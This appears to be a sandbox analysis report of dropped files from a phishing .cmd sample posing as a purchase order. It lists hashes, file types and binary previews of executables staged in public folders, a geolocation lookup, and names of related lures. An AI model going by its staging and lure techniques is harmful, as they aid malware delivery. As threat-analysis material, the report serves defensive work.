                                                                                                                Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa+0,'',*45(3:;/3:;246/2'2+;-4&++(KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBal3(<952+27/KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa...........|.R.j<0..|:...F.)b.N.........$..=.>..&[b'sYo.V.@.U.P[..Zc.S.,Ykoo.....9.0.Z0~..4.3.S$:..fO~~..^K.>.zNj.mX).~$.P...[..Y..X}[}....F/.=!.oO(j.CTk.E.5d.^'.G\lq..IL..n. .3Dl..6.`4..c....Y..>U i....R..^S.p..'1-...9k.=...R..SZ.5c.^.ml...D...Fa.GT.\.W.,.B..l.[F..I.bO.>.Tn.VR..NV...Uk.!]..IN..c.aF.).\7.KV.NM*3..$....H...5Noa.ed...O0}.0.#yH.UP.3..R.}vU...z.Zc.L~M...y....M$.(..`.Ap..VN.+.O...*T.'sZ.T..`..qV.!.+)...~._..OL..CM.>.T.....2...:..2.A.Go..K...+t.R..Q2.q.^n.V...Q.,..=i..|...j;16...?.`.X.J.z3y.N..d.g.....J...o.y`f.KV.5..^$.q._0...;.Y<.e....;p.$.y.&HK'..^.KQB.!p.]..Noa...^S......+<+.j.S.8.T.O[..Q.2.\.K..E.X!6.`k.g....q._.DO....../gw....SF;.P.Mj.".......l..*Kb...hSh.0..0.#..W}.".#.,.A.G.Y.#.\..2S.Oo.>S.b..GV.....()..?.......w......I.!@.U|...#"g6bXG>.cQ...QS..!...`.n"...I.. .An.....BTZ|.%...Zc.^...\..@..4....D...[.b
                                                                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1465344
                                                                                                                Entropy (8bit):7.547181293460755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:jrVwDIOjBTiCcv9WeAvHUFQkHNJxrx0uHctgGqM0Fvj4irjlUIxB:j3dzA/CQk/d9ct0MEvjnj
                                                                                                                MD5:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                SHA1:6E87B535356C247834D0112F8846AC6F64D15247
                                                                                                                SHA-256:35D947955E37F039632EA8DA3A00296FA9C8D6C1ABE4B62C50D93B976B76C3FB
                                                                                                                SHA-512:75306AE1E4139E9CDD6CC5AAE7CD936E0379F2955D7246D5C05EFE1672B45D9A88B61BF143F0C57822711444D706102E14569A897EC2A2B53DADD841C82399BA
                                                                                                                Malicious:true
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................<&.......P...................0..d`........................... .......................................................text...,U.......V.................. ..`.itext..H,...p.......Z.............. ..`.data...............................@....bss.... 6...............................idata..<&.......(..................@....tls....4................................rdata....... ......................@..@.reloc..d`...0...b..................@..B.rsrc....P.......P..................@..@.....................\..............@..@................................................................................................
                                                                                                                Process:C:\Users\Public\kn.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1465344
                                                                                                                Entropy (8bit):7.547181293460755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:jrVwDIOjBTiCcv9WeAvHUFQkHNJxrx0uHctgGqM0Fvj4irjlUIxB:j3dzA/CQk/d9ct0MEvjnj
                                                                                                                MD5:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                SHA1:6E87B535356C247834D0112F8846AC6F64D15247
                                                                                                                SHA-256:35D947955E37F039632EA8DA3A00296FA9C8D6C1ABE4B62C50D93B976B76C3FB
                                                                                                                SHA-512:75306AE1E4139E9CDD6CC5AAE7CD936E0379F2955D7246D5C05EFE1672B45D9A88B61BF143F0C57822711444D706102E14569A897EC2A2B53DADD841C82399BA
                                                                                                                Malicious:true
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................<&.......P...................0..d`........................... .......................................................text...,U.......V.................. ..`.itext..H,...p.......Z.............. ..`.data...............................@....bss.... 6...............................idata..<&.......(..................@....tls....4................................rdata....... ......................@..@.reloc..d`...0...b..................@..B.rsrc....P.......P..................@..@.....................\..............@..@................................................................................................
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):289792
                                                                                                                Entropy (8bit):6.135598950357573
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Enquiry 230424.bat, Detection: malicious, Browse
                                                                                                                • Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious, Browse
                                                                                                                • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                • Filename: aaa.bat, Detection: malicious, Browse
                                                                                                                • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                • Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious, Browse
                                                                                                                • Filename: FT-3-TL-BALANCE,jpg.cmd, Detection: malicious, Browse
                                                                                                                • Filename: ONISZCZUK ASSOCIATES Purchase Order.bat, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):77312
                                                                                                                Entropy (8bit):5.996265028984654
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:/ZsKjopjN/cYXsuMdCAOznsA5q+oxxhRO+sAg9RyTVZiJXpnvo/vrK:FW5nspdCbzpq+iLcqjWXpvo/vm
                                                                                                                MD5:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                SHA1:C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE
                                                                                                                SHA-256:C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
                                                                                                                SHA-512:101907B994D828C83587C483B4984F36CAF728B766CB7A417B549852A6207E2A3FE9EDC8EFF5EEAB13E32C4CF1417A3ADCCC089023114EA81974C5E6B355FED9
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................r.........Rich............PE..d....6<..........."..........N.................@.............................p......@.....`.......... ..........................................D....P.......@..,............`..D.......T...........................0...............H...x............................text...p........................... ..`.rdata..(........0..................@..@.data...(....0......................@....pdata..,....@......................@..@.rsrc........P.......$..............@..@.reloc..D....`.......,..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):1651712
                                                                                                                Entropy (8bit):6.144018815244304
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\kn.exe
                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2930690
                                                                                                                Entropy (8bit):3.9393185097303203
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:/ffRlz0OgSXiZbDPlJJVr1SU8o2nxcaNgjUgoOLzF6u/NWedS6e9ucdix2Q8WbW9:H
                                                                                                                MD5:0CC78C776371256C0E6488752CEDB5ED
                                                                                                                SHA1:777A959592A22F66805B0C1B99F518658D75D76E
                                                                                                                SHA-256:5158C0E055999575BD178961F57409C6C6010658B5493C0577F84143666D5668
                                                                                                                SHA-512:85FE8796A3F9B286A150986F2D9462C54982C297A9529FD1A58F02FCF355A70F2058D443848A710AE2DB5907AF05718E64EE9D165503F79A1BCB11033F9BE452
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):452608
                                                                                                                Entropy (8bit):5.459268466661775
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                                SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                                SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                                SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3175
                                                                                                                Entropy (8bit):5.353293623550607
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:iqbYqGSI6o9xYsntpDxqKkWqmtzHfq1NYrKaq7BjwOIzQ0L:iqbYqGcQtpDxqKkWqmtzHfq1uLqBTIzt
                                                                                                                MD5:C4A02ED3EC7A44A9CD49B57022C29D97
                                                                                                                SHA1:B51BC5956BCCBAFD205D3776890D79800F6CFDF6
                                                                                                                SHA-256:F2F02FDD5177A7C78770E107A16D713E91C070114743FE97A8198E92D758E10D
                                                                                                                SHA-512:352FDC733C6D495C66CF409A55D325FD1C5032E0445F700F0AF4CFA20BB5FA5DA56E241F2AEA567BFD610E272F2A4D84270F362E9503BB968E3D2C8C389C7812
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):961
                                                                                                                Entropy (8bit):5.006421839568594
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:tkEQnd6UGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7La:qPdVauKyGX85JvXhNlT3/7SxDWro
                                                                                                                MD5:45E5FB8A57767E70ABBB831198544CBD
                                                                                                                SHA1:AE58409A68046431B8CEFA156B479D52A42FA04C
                                                                                                                SHA-256:8759C30926404F8E7732BE417797B412C23A897D7DC24D20CF4D87F7BEA04EDB
                                                                                                                SHA-512:10AF734866C2CC4B103526E7D332448041C9354E4E7B142BA1BDCB5471BE81087CED1501E5955C42036E3433066DE6B8B7C516B9B2AFC91BE4C1E34B2201BE67
                                                                                                                Malicious:false
                                                                                                                Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllul1jR:NllU
                                                                                                                MD5:0EC63F8643FAD46EC878DB86E00F7FF5
                                                                                                                SHA1:53D9444F5369A346E09B2E3D95E06D838BD43A52
                                                                                                                SHA-256:E35DD4598E36CB170B240FD08843073B98DD8BDA901C13FCEBC923ABA2EAE934
                                                                                                                SHA-512:EF572FBB9395F9077C737A458960558BDB7CBBDD183001ECEB1ABF4B82784F0B16E3A7BA1F1F3353E73387AEBC28952A198979E10FE3FD13F2064E69DA69677F
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.9810730124670894
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8jwdQTUUNAHycidAKZdA19ehwiZUklqeh/y+3:8bvNUQy
                                                                                                                MD5:41FC6CAD4B066EE5A3A71A28F9F2BFC0
                                                                                                                SHA1:A3548734E199A65985ACF8A7ADEE443B936DDCBA
                                                                                                                SHA-256:38A2701E028F51C090666C33362D02F69E600A0C6EEB9C74961D6DF3887526E0
                                                                                                                SHA-512:A867894975EA2507334598B777603BE373D1444000D3224511AFA862EA3B01C8FE81B0C845E2C2417233BCD5032A09A74351620537FF8BD53DB8370E111608B8
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):3.9950126634179273
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8gwdQTUUNAHycidAKZdA1weh/iZUkAQkqehAy+2:8OvNm9Qhy
                                                                                                                MD5:8E713A83B7FBAE4BF7A0B2E1D5A0B560
                                                                                                                SHA1:C2026D26F8CAA1A5ECCC99501077BF0F1AB99C11
                                                                                                                SHA-256:23A97A2B003C6EE8472EE76C001D7158CCDAA56153FDBE96D4D01610C0B5D92F
                                                                                                                SHA-512:54A2E29630493B79B4C406A2182D9F0BEB73293522DA7C44726DEC0F59E5A5D24D08FA7CC21876AF95FB57D207108D9EF26C50BC6D3B64F8F77C609B4C892CBE
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2693
                                                                                                                Entropy (8bit):4.007092300208588
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8xKwdQTUUsHycidAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xQvSnMy
                                                                                                                MD5:B9E5A4C0A9D99BC1A3F77F56ED0D32B0
                                                                                                                SHA1:9AFBB3A1D1F7F5543388AB53268F3A35870A3639
                                                                                                                SHA-256:88E379A4BB42DD0DED879B2B8F434D0C17B5FC35CA603FAE78F5DA812B3C6007
                                                                                                                SHA-512:0C408D5ED46D938D0CBED335CEC53457CD3FBD7B8F503B6A38EF56B641A4919B03A13433262248437E7C128259B8C14753F57E1BFE15FED5775DA2FFC4E61E26
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.9943267638383952
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8iQwdQTUUNAHycidAKZdA1vehDiZUkwqehEy+R:8ievNt6y
                                                                                                                MD5:860838C8C7F7CFA0A39164A0DA581ACD
                                                                                                                SHA1:2CDE0B2DFC6F1EEA9817F62C0E67A47DE23BF87C
                                                                                                                SHA-256:1BC7932590812A596FFF2D2DD9A0D9E7311E87F956604B10EB4B9630FDE4AE8F
                                                                                                                SHA-512:C6252C7431DF481F34DFCF4325347781286C65FA4C219E64697CE785D9F338E6C52D318A56DAED311DB69AF30059081C89B8D9256A076007E443DDF0C99F3601
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.9834847146215777
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:87wdQTUUNAHycidAKZdA1hehBiZUk1W1qehuy+C:8zvNt9Oy
                                                                                                                MD5:D48E920E1AD289DBCCD02979355C4044
                                                                                                                SHA1:5F1FDBA03E36F4579A543C5D8639B66E818F35C7
                                                                                                                SHA-256:6D8C811EA0026E5F480D24EC0DDF0CC4601C2F8F6644D93E2661833553EEACEC
                                                                                                                SHA-512:3E615D8A02003A0F9E2052898AE09B3795F1D1713BEBEC119E06FCC2ABD3E72BF4E32BF06A0EABE1F5BD5587C9A373CA839FB9C4AC3C77C13397982347B88BDB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2683
                                                                                                                Entropy (8bit):3.9956547720426796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8iwdQTUUNAHycidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbMy+yT+:8IvNxT/TbxWOvTbMy7T
                                                                                                                MD5:888B9BAC5816B33B97867A8A03123AB7
                                                                                                                SHA1:3172CCCEAFC0AA9ECED71848A59319CDACAD7A39
                                                                                                                SHA-256:864A0BAA9337E4D0D7D8B5916DA60CAF792F1B754523841F3F9F56ECCA714D2E
                                                                                                                SHA-512:A5F5A50ECC41715AC33F5A7639CA830348A8D02A55A65945EFCB963F7FC3454737C9F1D8B246B6D8BC615CFB74627165F9479806B55F3EEACFBFB9BCDCA596B5
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,......5.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (773)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):778
                                                                                                                Entropy (8bit):5.139784303307584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:pM8DMGkoRpHRBHslgT9lCuABuoB7HHHHHHHYqmffffffo:i8QGkwHRKlgZ01BuSEqmffffffo
                                                                                                                MD5:598FA3BFA22B098EA89CAFEF09C9E2BE
                                                                                                                SHA1:B549A68710A4A74DF9AF7991C327A3C928B4DE84
                                                                                                                SHA-256:7B3D1884CE328B615566624823F7DA5C2C8D212268E3A05D05E5A765560871BD
                                                                                                                SHA-512:9A1FC6643F69A7A2F3C8117D89E526E58B2865050376848BB28DCEA6FBCDAAA6BDCBC3A2A40CCE370C007C6FE00F7ECDD2EBC8C899D8F3D1E9E4BCBDA6E66ADD
                                                                                                                Malicious:false
                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                Preview:)]}'.["",["blizzard canceled blizzcon","lord of the rings in theaters 2024","usc graduation ceremony","bucs draft picks","layoffs bristol myers squibb","chicago bears nfl draft picks 2024","stellar blade ign","laguardia airport"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                Process:C:\Users\Public\alpha.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):104
                                                                                                                Entropy (8bit):4.403504238247217
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                                                                MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                                                                SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                                                                SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                                                                SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                                                                Malicious:false
                                                                                                                Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
                                                                                                                File type:Unicode text, UTF-8 text, with very long lines (3004), with CRLF line terminators
                                                                                                                Entropy (8bit):4.975920910175679
                                                                                                                TrID:
                                                                                                                  File name:Purchase Order is approved26042024.cmd
                                                                                                                  File size:4'050'655 bytes
                                                                                                                  MD5:8d5ff3734fb8dddaf133ff8ef662aa1d
                                                                                                                  SHA1:08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
                                                                                                                  SHA256:0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
